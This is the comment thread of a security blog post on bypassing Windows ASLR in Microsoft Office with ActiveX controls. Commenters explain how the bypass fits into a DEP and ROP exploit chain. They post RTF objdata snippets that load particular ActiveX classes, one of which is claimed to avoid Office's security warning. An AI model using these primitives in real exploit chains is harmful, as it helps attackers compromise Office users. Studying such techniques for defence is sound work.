7 comments on “Bypassing Windows ASLR in Microsoft Office using ActiveX controls

  1. Could you tell us how these activex are named in office “More controls”
    I can’t find them.

  2. Hi Joe, yes you’ll need an actual vulnerability. Say you’ve placed shellcode in memory, in order to execute it you’ll need to make that memory where the shellcode resides executable. To make it executable you’ll need to bypass DEP. For this you need ROP shellcode and for this shellcode you need to start with a fixed address and that’s where ASLR bypass comes in.

  3. @
    “{20347534-760B-464D-B572-285E6B618257} SSCE.Error.3.5”

    Is thir right:

    [code]
    {\object\objocx{\*\objdata
    01050000
    02000000

    08000000
    535343452E4572726F722E332E35

    00000000
    00000000
    D4290000
    }} [/code]

  4. This is the correct code below, the size was wrong and the hex string needs to be null terminated

    {\rtf1{\object\objocx{\*\objdata
    01050000
    02000000
    0F000000
    535343452E4572726F722E332E3500
    00000000
    00000000
    01000000
    41
    01050000
    00000000
    }}}

  5. Here is an example of loading classid {BC0CD90A-2C24-41BE-B6EC-87C15D919418} in RTF format that doesn’t give the security warning

    C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x86\FeedSync.dll

    {\rtf1{\object\objemb{\*\oleclsid \’7bBC0CD90A-2C24-41BE-B6EC-87C15D919418\’7d}{\*\objdata
    01050000
    01000000
    01000000
    00000000
    00000000
    00000000
    00000000
    00000000
    00000000
    00000000
    00}}}

Leave a Reply

Your email address will not be published. Required fields are marked *